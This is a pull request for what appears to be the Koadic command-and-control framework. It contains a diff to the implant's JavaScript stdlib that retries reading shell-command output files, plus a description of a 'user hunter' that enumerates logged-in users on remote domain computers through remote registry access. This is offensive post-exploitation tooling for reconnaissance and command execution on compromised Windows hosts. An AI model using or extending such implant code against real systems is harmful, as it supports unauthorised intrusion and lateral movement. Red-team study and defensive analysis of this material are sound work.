### PR TITLE
Improved user hunter + Fixed shell.exec with a hack

### DIFF
--- a/data/stager/js/stdlib.js
+++ b/data/stager/js/stdlib.js
@@ -684,11 +684,20 @@ Koadic.file.get32BitFolder = function()
 
 Koadic.file.readText = function(path)
 {
-    var fd = Koadic.FS.OpenTextFile(Koadic.file.getPath(path), 1, true, 0);
-    var data = fd.ReadAll();
-    fd.Close();
-
-    return data;
+    while(true)
+    {
+        if (Koadic.FS.FileExists(Koadic.file.getPath(path)) && Koadic.FS.GetFile(Koadic.file.getPath(path)).Size > 0)
+        {
+            var fd = Koadic.FS.OpenTextFile(Koadic.file.getPath(path), 1, false, 0);
+            var data = fd.ReadAll();
+            fd.Close();
+            return data;
+        }
+        else
+        {
+            Koadic.shell.run("ping 127.0.0.1 -n 1", false);
+        }
+    }
 }
 
 Koadic.file.readBinary = function(path)


### PR DESCRIPTION
This PR accomplishes 2 things:

1. User hunter now includes reading the currently logged in users from the registry of a remote computer. This produces similar results to NetWkstaUserEnum with the main benefit that the running user doesn't have to have local admin rights on the remote computer. The only requirements are that the current user needs to be part of the domain and the remote computer needs to have remote registry access enabled. I'm pretty sure Bloodhound and Empire's user hunter both do the same thing, so I think we're making par.

2. Shell.exec works by running a command with WScript.Shell, redirecting output to a file, reading the file, then deleting the file. However, about 20% of the time, I find that Koadic can't read from the file because WScript.Shell is still in the process of writing to it, even though execution flow isn't supposed to continue until it's done writing. This caused a problem because an "Input past end of File" exception would get thrown and the resulting file wouldn't get deleted, it just hangs out in \~DIRECTORY\~. To fix this, Koadic will check for file existence and file length above 0 before reading. If this fails, Koadic will issue a localhost ping command and try again. You may be asking why I don't use Koadic.sleep(). That's because Koadic.sleep() is a shitty hack too, and I like my hack better than that hack. Suck it, @zerosum0x0. Anyways, I spammed the shit out of some commands and none of the file reads failed, so I'm gonna say it's all good to go now.